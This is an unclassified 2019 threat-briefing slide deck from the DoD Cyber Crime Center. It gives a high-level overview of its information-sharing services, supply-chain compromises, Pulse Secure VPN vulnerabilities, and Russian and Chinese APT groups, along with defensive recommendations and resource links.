DoD Cyber Crime Center UNCLASSIFIED UNCLASSIFIED Threat Brief DoD Cyber Crime Center (DC3) Mr. John Stoner Deputy Director, DCISE [email protected]
DoD Cyber Crime Center
UNCLASSIFIED
UNCLASSIFIED
Threat Brief
DoD Cyber Crime Center (DC3)
Mr. John Stoner
Deputy Director, DCISE
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 2
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Disclaimer
◼ The information contained herein represents unclassified, publically available information and
does not contain USG, or DOD sourced information.
◼ Any specific product, process, or service referenced by this server, that is not provided by the
U.S. Government, does not constitute or imply an endorsement by DC3/DCISE, the Department
of Defense or the United States Government of the product, process, or service, or its
producer or provider. Additionally, any information or opinions expressed in any referenced
document not published by the Government do not necessarily constitute or reflect agreement
or concurrence by DC3/DCISE, the Department of Defense or the United States Government as
to their accuracy or opinion content.
11/12/2019
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 3
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Agenda
◼ DC3 (DoD Cyber Crime Center) brief overview
◼ DoD-DIB (Defense Industrial Base) Collaborative
Information Sharing Environment (DCISE) brief overview
◼ Advanced Persistent Threat (APT) summary
◼ Russian APT overview
◼ Chinese APT overview
◼ Deep Panda APT overview
◼ Questions and Discussion
◼ Additional Resources
11/12/2019
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 4
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
DC3 Overview
◼ A DoD technical center for digital and multimedia (D/MM) forensics, cyber
training, technical solutions development, and cyber analytics supporting
DoD and National requirements in:
• Law Enforcement and Counterintelligence (LE/CI)
• Document and Media Exploitation (DOMEX) and Counterterrorism (CT)
• Cybersecurity (CS) and Critical Infrastructure Protection (CIP)
◼ DoD’s single repository for all defense contractor mandatory cyber incident
reports; operational focal point for DIB voluntary sharing program
◼ SECDEF designated lead for the DoD Vulnerability Disclosure Program (VDP)
◼ One of seven NSPD-54 designated Federal Cyber Centers
11/12/2019
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 5
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
DC3 Directorates
11/12/2019
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 6
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
DIB Collaboration
What is DC3’s role?
◼ Operational focal point for voluntary partnership of ~650 Cleared Defense
Contractors (CDCs)
--Guidance: DoDI 5205.13, 32 CFR Part 236 & Framework Agreements
◼ Single repository for ALL mandatory cyber incident reports affecting CDC
unclassified networks
--Guidance DFARS 252.204-7012
Basis for DC3 DIB products/analytical conclusions:
◼ Analysis of nation-state Advanced Persistent Threats (APTs) DIB cyber events
since February 2008
• Performed ~42,000 hours of no-cost forensics and malware analysis
• Published ~9,614 cyber reports
• Shared ~356,404 actionable, non-attributional indicators
• Informed by multiple USG data streams (law enforcement, intel, counterintelligence)
and industry cyber threat reports
11/12/2019
All reporting via Incident Collection Format (ICF) at https://dibnet.dod.mil
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 7
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
11/12/2019
DCISE Services
A2A AND B2B
MEETING
DIB NETWORK
DIBNET: For
online incident
reporting and
accessing DCISE
threat products
Tailored to Partner
cyber team and
specific threats
targeting networks
(Analyst-to-Analyst)
or with executives to
discuss cyber defense
(Business-to-Business)
TECHNICAL
EXCHANGES
Interactive
industry and
government forum
for deep technical
discussion on a
wide-variety of
cyber threat
related topics
THREAT
PRODUCTS
Cyber threat
products,
warnings, and
administrative
notices to
strengthen
cybersecurity
DIB TECHNICAL
TELECONFERENCES
DIB Partners and
DCISE Analysts
address current
adversary
techniques and
trends
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 8
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Threats
11/12/2019
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 9
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Supply Chain Risks
11/12/2019
◼ Supply chain intrusions focus on
exploiting trust
◼ Actors compromise components of
a trusted delivery process
◼ Compromised code in trusted
software CCleaner in March 2017
◼ Avast CTO confirmed 2.27 million
downloads of the infected version
◼ In the CCleaner compromise the true
targeted companies were:
◼ Akamai, Cisco, D-Link, Google,
HTC, Linksys, Microsoft,
Samsung, Sony, and VMware
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 10
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
2018 - Supply Chain Survey
11/12/2019
Reference: 2018 CrowdStrike Supply Chain Report
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 11
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Supply Chain Targeting
11/12/2019
◼ Since 2013, the Chinese government has put pressure on US Information
and Communications Technology (ICT) companies:
• Surrender source code; store data on Chinese Servers
• Invest in Chinese companies
• Permit security audits on ICT products by government agencies
◼ Cyberspace is a preferred operational domain for economic espionage, it is
but one of many
◼ Sophisticated threat actors combine
cyber exploitation with supply chain
operations, human recruitment, and
the acquisition of knowledge by
foreign students as part of a
strategic technology acquisition
program
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 12
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Pulse Secure VPN
◼ Pulse Secure is an SSL (Secure Sockets Layer) VPN utilized in enterprise environments
◼ Multiple APT actors have weaponized CVE-2019-11510, CVE-2019-11539, and CVE-2018-13379 in order to perform remote file downloads and remote code execution
◼ Vulnerabilities also allowed for interception and hijacking of encrypted traffic sessions
◼ Impacted products include: Pulse Connect Secure 8.1RX, 8.2RX, 8.3RX, and 9.0RX and Pulse Connect Secure 5.1RX, 5.2RX, 5.3RX, 5.4RX, and 9.0RX
11/12/2019
◼ Workable exploits already available on Metasploit and
other similar platforms
◼ CVE-2019-11508 and CVE-2019-11538 mitigated by
disabling FileShare features
◼ CVE-2019-11510 has security patches available from
Pulse Secure’s download center◼ https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-
VULNERABILITIES.PDF
◼ https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 13
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Advanced Persistent Threats
◼ Cyber as a technique and methodology for
conducting nation-state sponsored
espionage is a logical continuum in terms
of spying
◼ “State sponsored groups may target
organizations or governments to steal
financial information, defense information,
information that would grant a geopolitical
economic or technological advantage, or
any information that would be of use in
intelligence or counterintelligence
operations”
◼ Long Patience
◼ Deep Pockets
◼ Full backing of national assets
11/12/2019
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 14
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Threat Vectors for APTs
◼ Spearphishing
◼ Strategic web compromise
◼ Social engineering
◼ Zero-day exploits
◼ Domain spoofing
◼ Compromise web servers
◼ Weaponized Office documents
◼ SQL injection
◼ Web vulnerabilities
11/12/2019
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 15
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Notable Russian APTs
◼ APT 28 – aka Sofacy and Fancy Bear
• Suspected Russian APT 28 is a state sponsored group active
since 2007
• Most APT 28 malware was compiled between Monday –
Friday from 0800 – 1800 in UTC+4. This parallels working
hours in Eastern Europe, Moscow, and Saint Petersburg
• APT 28 relies upon spear phishing or zero-day vulnerabilities
to initially compromise victim systems.
• Suspected to be behind the VPNFilter and NotPetya
◼ APT 29 - aka CosmicDukes, Cozy Bear
• Suspected Russian APT 29 is an adaptive and disciplined
threat group that hides its activity on a victim’s network,
communicating infrequently with obfuscation to resemble
legitimate traffic
• APT 29 is one of the most evolved and capable threat groups
• It deploys new backdoors to fix its own bugs and adds
features (they patch their malware)
11/12/2019
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 16
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Chinese APT Summary
◼ China is focused on taking exclusive data from both non-governmental
associations and governments which feed their modern military complex
◼ The Chinese intelligence apparatus has been reported on under many names,
including Winnti, PassCV, APT17, Axiom, BARIUM, Wicked Panda, and GREF
◼ The experts believe that under the Winnti umbrella there are several APT
groups, including Winnti, Axiom, Wicked Panda, and ShadowPad – they use
similar TTPs and in some cases shared portions of the same infrastructure
11/12/2019
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 17
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Deep Panda, APT 19, Shell Crew, PinkPanther
◼ Deep Panda began attacking healthcare,
aerospace, and energy sectors around 2012
◼ The intrusion into Anthem has been
attributed to Deep Panda and they are
suspected culprits for the OPM hack as well
◼ Possibly behind the 2017 CCleaner exploit
◼ Continued evolvement of technical TTPs
11/12/2019
◼ Probably using VPNs to mask origin of attack and obfuscate attribution
◼ Commonly uses China Chopper Webshell:
◼ https://www.cyber.nj.gov/threat-profiles/trojan-variants/china-chopper
◼ Recorded Future observed intense activity related to the Apache Struts
vulnerability in several Chinese (and Russian) underground forums
◼ The Equifax hack was probably due to the Apache Struts vulnerability
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 18
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Before Threat Intelligence
11/12/2019
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 19
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Final Thoughts
◼ APTs use various methodology for victim compromise
◼ Spearphishing is a vector used by all threat actors
◼ Security professionals should implement standardized
and common defensive practices (patching, MFA)
◼ There are a variety of sources for cyber threat
information and recommended mitigations
◼ Basics required before cyber threat intel has value
◼ No organization is immune to cyber threats or attacks
11/12/2019
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 20
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Questions?
11/12/2019
DoD Cyber Crime Center
UNCLASSIFIED
UNCLASSIFIED
410-981-1085
Toll Free DCISE Hotline: (877) 838-2174
DCISE Email: [email protected]
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 22
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
Resources◼ Threat Resources
• https://cyber-peace.org/wp-content/uploads/2018/02/APT-Groups-and-Operations.xlsx
• https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview#
• https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/
• https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world
• https://www.cisco.com/c/dam/m/hu_hu/campaigns/security-hub/pdf/acr-2018.pdf
• https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf
• https://github.com/fdiskyou/threat-INTel/blob/master/2016/ICIT-Brief-Know-Your-Enemies-2.0.pdf
• https://drive.google.com/file/d/0B1fYfQFfD2khdG4taVYtbDFJQzQ/view?usp=sharing
• https://media.dau.mil/media/DCISE+Cyber+Threat+Intel+and+APTs+101_v2/0_9b59yo0m
◼ Cybersecurity Information Resources
• https://niccs.us-cert.gov/workforce-development/cyber-security-workforce-framework/training-education-and-
awareness
• https://www.sans.org/security-awareness-training
• https://securityawareness.usalearning.gov/cybersecurity/index.htm
• https://www.cdse.edu/toolkits/cybersecurity/training.html
• https://cybernetsecurity.com/industry-papers/CIS-Controls%20Version-7-cc-FINAL.PDF
• https://www.cyber.gov.au/advice/how-to-mitigate-cyber-security-incidents
• https://www.ftc.gov/tips-advice/business-center/small-businesses
11/12/2019
Any specific product, process, or service referenced by this server, that is not provided by the U.S. Government, does not constitute or imply an
endorsement by DC3/DCISE, the Department of Defense or the United States Government of the product, process, or service, or i ts producer or provider.
Additionally, any information or opinions expressed in any referenced document not published by the Government do not necessarily constitute or
reflect agreement or concurrence by DC3/DCISE, the Department of Defense or the United States Government as to their accuracy or opinion content.